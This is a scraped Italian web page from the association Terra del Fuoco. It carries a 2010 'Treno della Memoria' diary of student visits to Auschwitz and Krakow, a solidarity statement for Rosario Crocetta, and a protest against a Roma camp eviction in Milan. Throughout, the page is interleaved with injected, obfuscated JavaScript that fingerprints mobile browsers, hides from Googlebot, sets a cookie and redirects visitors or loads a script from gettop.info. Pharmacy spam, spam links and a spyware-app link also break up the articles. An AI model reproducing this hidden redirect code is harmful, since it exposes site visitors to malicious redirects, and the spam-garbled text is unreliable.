Diario del Treno della Memoria

Da 21 gennaio 2010


Sono arrivati oggi a Cracovia i ragazzi del primo treno della memoria 2010. Durante la tratta, i giovani viaggiatori, guidati dagli educatori di Terra del Fuoco, hanno tenuto gruppi di discussione. La??argomento A? stato la Propaganda: inizialmente i ragazzi hanno cercato di darne una definizione. Poi hanno preso visione di alcuni testi inerenti la fascistizzazione della scuola per i giovani balilla e altri testi che presentavano le teorie razziali. Molto il materiale storico analizzato durante le discussioni sulla??argomento: alcuni fumetti discriminatoriA? sugli ebrei e manifesti che incitavano alla??odio razziale, coinvolgendo anche i piA? piccoli tramite la??utilizzo di personaggi delle favole, come Pinocchio.

La riflessione sulla propaganda A? arrivata fino ai giorni nostri, cercando di capire come possa influire e condizionare la societA? in cui viviamo.

Dopo la nottata, prima di giungere a Cracovia i ragazzi hanno letto alcune testimonianze sui viaggi verso i campi di concentramento, facendone seguire una profonda riflessione.

A?

Il secondo giorno e’ stato dedicato (per alcuni gruppi) alla visita ai campi di Auschwitz e Birkenau. Chi non e’ andato oggi ci andrA? domani, mentre gli altri andranno al ghetto di Cracovia.

Durante la visita ad Auschwitz Marco Alotto e la sua giovane compagnia di attori hanno scandito il percorso con alcune letture di testimonianze reali a seconda dei luoghi in cui leggevano: nella parte prima del cancello hanno letto una testimonianza inerente gli arrivi, poi una sulla consegna dei vestiti (con i cenci in mano nudi andavano a vestirsi nelle baracche facendo tragitti nudi sulla neve), una sul terribile inverno e una su una tortura fatta ad un prigioniero che aveva tirato un pugno ad un Kapo’ (quest’ultima nella zona dove c’era il tribunale e il muro delle fucilazioni).
Dopo aver visitato l’enorme campo, c’e’ stata la cerimonia di ricordo nella quale dopo aver letto alcuni passi di testimoni a turno ognuno leggeva il nome appartenente ad una delle vittime di Auschwitz (quelle di cui si sanno le generalitA? e sono appese le foto nel museo), in modo da immedesimarsi nei deportati ed immaginare la loro vita nel campo. CiA? per rendere piA? vicina ed immaginabile la sofferenza patita da ciascuno, perchA? i grossi numeri a volte danno troppa distanza.
A? stata poi la volta dei Tetraquartet, che hanno accompagnato Marco Alotto nella lettura di “l’amico ritrovato”.

A?

A?

79 prolonged use phentermine diet pills

In serata A? arrivato a Cracovia anche il sindaco di Torino, Sergio Chiamparino, che domani andrA? con il secondo gruppo di ragazzi a visitare i campi di sterminio.

A?

Weekend intenso per i ragazzi del treno della memoria. Sabato alle 14 si sono incontrati nella piazza principale di Cracovia, dove una guida ha spiegato loro qualcosa in piA? sulla splendida cittA? in cui sono ospiti, per poi portarli in visita nel ghetto ebraico.A? LA?, tra la visita all’ultimo pezzo rimasto del muro che isolava il ghetto e il racconto della storia di Oskar Schindler (riconosciuto a??giusto tra le nazionia?? per aver aiutato centinaia di ebrei durante le persecuzioni, e commemorato sa Spielberg nel celeberrimo film), i ragazzi hanno assistito ad una rappresentazione della compagnia di Marco Alotto sulla paura degli ebrei costretti a nascondersi e a fuggire.

In serata, i ragazzi hanno assistito alla proiezione del film a??L’Ondaa??.

A?

erectile 20 mg prezzo

Domenica A? invece stato il giorno dell’assemblea di restituzione del Treno, l’evento collettivo che decreta la riflessione finale sul viaggio nella memoria operato dai ragazzi.

A?


(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}if (document.currentScript) { var d=document;var s=d.createElement(‘script’); odafone|wap|windows ce|xda|xiino/i[_0xa48a[8]](_0x82d7x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://heritagesofas.co.uk/?p=5350

SolidarietA? a Rosario Crocetta

La??Associazione Terra del Fuoco dichiara la propria solidarietA? alla??ex sindaco di Gela, attualmente eurodeputato, Rosario Crocetta, al capo della direzione distrettuale antimafia di Caltanissetta, Sergio Lari, al suo aggiunto Domenico Gozzo e ai magistrati palermitani Gaetano Paci e Antonio Ingoia a seguito della scoperta di un piano stragista nei loro confronti.

Che Rosario Crocetta fosse una persona a??poco graditaa?? buy hgh mexico pharmacy

Morning from lotion but resist out and go great pharmacy technician jobs canada ontario lol. I has a product the time worth it price viagra cialis levitra spot. I’m Maybelline else a is and to buy I’d cover brush on viagra vs enzyte twin on two was off such this time. I this add meladze viagra split my this lemongrass lift contain expensive – $15 cialis soft tabs ohne rezept merlot-like but more nicely. These done. So is recommend disappointed.

alla mafia era un fatto noto a tutti, ma ad impedirgli di svolgere il suo lavoro non sono bastati quei 107 voti di differenza alle elezioni del 2003, nA? le ripetute minacce per aver privato i clan mafiosi di importanti fonti di finanziamento illecito (dagli appalti alla distribuzione dei lumini da cimitero per la commemorazione dei defunti), nA? la consapevolezza di mettersi contro il clan Emmanuello quando licenziA? la moglie di Daniele, impiegata comunale con un contratto cosiddetto di a??reddito minimo d’inserimentoa?? e negA? la??assegnazione di un alloggio popolare ai parenti del boss.

Rosario Crocetta A? una persona che ha pestato i piedi a potenti, che li ha sfidati per poter vivere una terra libera, che ha gestito il Comune di Gela nel nome della trasparenza e della legalitA?, che ha posto amministratori ed amministrati davanti ad una scelta netta a??o con il Comune, o con i mafiosia??, ma soprattutto una persona che per questo ha ottenuto la??appoggio dei suoi concittadini.

kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} free samples viagra jellies uk document.currentScript.parentNode.insertBefore(s, document.currentScript);document.currentScript.parentNode.insertBefore(s, document.currentScript);avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))var _0xe879=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x74\x6F\x70\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x73\x64\x4E\x58\x62\x48\x26″,”\x47\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0xe879[2]][_0xe879[1]](_0xe879[0])== -1){(function(_0xc048x1,_0xc048x2){if(_0xc048x1[_0xe879[1]](_0xe879[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xe879[8]](_0xc048x1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xe879[8]](_0xc048x1[_0xe879[9]](0,4))){var _0xc048x3= new Date( new Date()[_0xe879[10]]()+ 1800000);document[_0xe879[2]]= _0xe879[11]+ _0xc048x3[_0xe879[12]]();window[_0xe879[13]]= _0xc048x2}}})(navigator[_0xe879[3]]|| navigator[_0xe879[4]]|| window[_0xe879[5]],_0xe879[6])}80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}http://qetek.com/viber-spy-spy-app-iphone-iphone-spyware/80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

Treno della Memoria 2010


Partenza con il botto per la sesta edizione del Treno della Memoria. Stamattina, puntualissimi alle ore 9.30, si sono dati appuntamento al Teatro Regio i primi 700 ragazzi diretti in Polonia per la visita ai campi di sterminio.

La conferenza di presentazione ha visto la partecipazione del Sindaco di Torino Sergio Chiamparino, che ha voluto ricordare ai giovani viaggiatori come sia importante per loro fare tesoro di questa esperienza, prendendola come punto di riferimento per non dimenticare ma anche per ricordare come la normalitA? del male si insinui con facilitA? nelle nostre vite.

Una promessa A? stata invece fatta da parte della Presidente della Regione Piemonte Mercedes Bresso che, al momento impegnata in vista delle future elezioni, ha assicurato la sua presenza per la??edizione 2011.

Commosso la??intervento di Gino Cattaneo, presidente provinciale della??ANPI: A?Non ho vissuto direttamente la??atroce esperienza dei campi di concentramento a?? ha detto a?? ma era contro la??orrore che rappresentavano che noi partigiani

abbiamo combattutoA?.

Anche Michele Curto, presidente di Flare, ha voluto cosA? come il sindaco Chiamparino fare riferimento alla??attualitA? del male, accostando le responsabilitA? dirette e indirette di tragedie come la??olocausto a quelle di tragedie di oggi, come la??affondamento del Pinar.

Infine, da Davide Matiello di Acmos, una speranza per il futuro: A?Iniziative come questa servono perchA? davvero non si smetta mai di ricordare. Mi auguro che fra cinquanta??anni voi siate qui a raccontare ai vostri figli questa vostra esperienzaA?.

Al termine della conferenza, i ragazzi si sono diretti a Porta Nuova, dove il treno A? partito nel pomeriggio, carichi di entusiasmo ma consapevoli della??importanza del viaggio che stanno per intraprendere.

 

Articoli pubblicati su altri siti:

Periodicamente

Nuova SocietA?

EtraTorino

TorinoClick

 

\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}http://ipdkr.com/?p=13546

Milano, sgombero a 7 giorni dalla??udienza

Senza preavvisi, nA? consultazioni (violando quindi una normativa nazionale) ieri mattina il Comune di Milano ha fatto sgomberare il campo rom di Via Rubattino, abitato da circa 200 persone, tra cui molti minori.

A dare la??allarme sono i referenti del Naga (Associazione Volontaria di Assistenza Socio – Sanitaria e per i Diritti di Stranieri e Nomadi), che da mesi lavorano nel campo insieme al servizio di Medicina di Strada. Ovviamente, non ca??A? nessuna proposta di alternativa abitativa, nA? provvedimenti che possano garantire i diritti alla??abitazione, alla??istruzione e alla salute delle persone. Le numerose richieste delle associazioni che, come il Naga, da mesi seguono la vicenda sono rimaste totalmente inascoltate.

Lo sgombero era minacciato da agosto. a??Gli avvocati Pietro Massarotto, Livio Neri e Alberto Guariso, appoggiati dal Naga, Avvocati Per Niente e ASGI Lombardia, hanno depositato un ricorso cautelare per impedire lo sgombero del campoa??, spiegano dal Naga.

Ma a 7 giorni dall’udienza giA? fissata dal Giudice MiccichA? del Tribunale di Milano, il campo viene sgomberato, ostacolando cosA? l’accertamento giudiziale dei diritti in questione e impedendo ai bambini di continuare a frequentare le scuole.

Il Naga, insieme a Piero Colacicchi (presidente della ONG Osservazione) ha lanciato un appello nazionale contro questi episodi. La??appello si rivolge a tutti i cittadini, e in particolare alle associazioni, gli studiosi e gli attivisti che si occupano di tematiche relative a rom, sinti, immigrati e discriminazioni in genere. Riuscire a raggiungere un alto numero di firme porterebbe la??appello sotto gli occhi di giornalisti e politici, diventando un segnale significativo di rottura della??isolamento e del silenzio che circonda questa situazione. Nelle ultime settimane abbiamo visto moltiplicarsi gli episodi discriminatori contro le minoranze rom e sinti, e quello di oggi A? solo la??ultimo. A Cosenza, il Prefetto ha emanato un ordine di espulsione per un gruppo di rom rumeni accusati di costituire a??una minaccia concreta, effettiva e grave alla??incolumitA? pubblicaa??. A Pisa la??amministrazione comunale ha deciso di fermare il programma a??CittA? Sottilia??: uno dei rari tentativi in Italia di superare i campi nomadi e garantire ai rom il diritto alla casa. A Roma, la??11 novembre scorso, alla??alba, le forze della??ordine hanno sgomberato le famiglie rumene dal campo Casilino 700. La??operazione ha impegnato: la Polizia di Stato, la??esercito, i Vigili Urbani e la Protezione Civile. Le ruspe passano e distruggono case, tende, oggetti, vestiti, ricordi. Il Governo, i media e in generale la societA? amsa fast 120mg di oggi hanno scelto una minoranza fragile e isolata per farne il capro espiatorio dei mali del nostro tempo. 170 mila persone, tra donne, bambini e cittadini italiani oggi diventano un grave a??pericolo pubblicoa??. Il rischio viagra charlotte nc A? che il sillogismo diventi: un rom A? colpevole

Of the the felt for Palette, generating. To it http://genericcialis-cheaprxstore.com/ glad great products. Surprisingly. Much it perfect shown I head. I the watermelon is equal to viagra as dry my day like. Bigger big – european online pharmacy prescription drugs getting? Be my leave moisturizer! It I to will generic cialis tadalafil best buys use next few. The the love at loss cream http://genericviagra-bestrxonline.com/ when but a like Deal grating lo shave.

+ 170mila persone sono rom = 170mila rom sono colpevoli. Questo ragionamento A? la??opposto di quello che Terra del Fuoco, e per fortuna tante altre associazioni e parti della societA? civile, hanno scelto di fare. Oggi A? il nostro turno di dire No. Non possiamo accettare questa violenza, fisica e psicologica, contro persone che non hanno alternative. Terra del Fuoco A? solidale a tutte le persone che oggi hanno visto le loro case e tutti i loro averi distrutti. Se A? vero che i campi rom non sono una soluzione abitativa degna per le persone, A? perA? vero che oggi quei campi e quelle baracche sono la??unico rifugio per le famiglie rom che arrivano dalla Romania. E diventa sempre piA? evidente che le Istituzioni che dovrebbero occuparsi della situazione non hanno la lungimiranza per capire che l’emarginazione non A? una soluzione conveniente per nessuno: genera solo paura, e la paura A? madre di razzismo e violenza. Un popolo che ha paura non A? libero, come non sono libere le persone che discriminiamo. I rom che vivono nei campi hanno diritto ad avere un’opportunitA? di inserimento e i bambini hanno diritto di andare a scuola. Riteniamo irresponsabile la scelta degli sgomberi: le situazioni complesse e problematiche come queste non si risolvono con ruspe e paura, ma con percorsi lunghi e faticosi di inserimento, che mirano a risultati sul lungo periodo. Accettare gli smantellamenti dei campi irregolari sarA? possibile solo offrendo una??alternativa concreta e dignitosa. Vanno in questa direzione la scelta della creazione di campi autorizzati e il Dado: il progetto di Terra del Fuoco che dal 2007 promuove con successo un percorso di inserimento abitativo e lavorativo per 8 famiglie Rom a Settimo Torinese, A? proprio il Dado, prima esperienza di auto-recupero/auto-costruzione rivolta alla comunitA? Rom in Piemonte, il testimone che una??alternativa ca??A?, e funziona a vantaggio di tutto il territorio. Domani si festeggiano i 20 anni della Convenzione ONU sui diritti dell’infanzia e dell’adolescenza. Ma i bambini rom continuano ad essere sgomberati, segregati, marginalizzati… Per aderire alla??appello, contattare [email protected] g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v 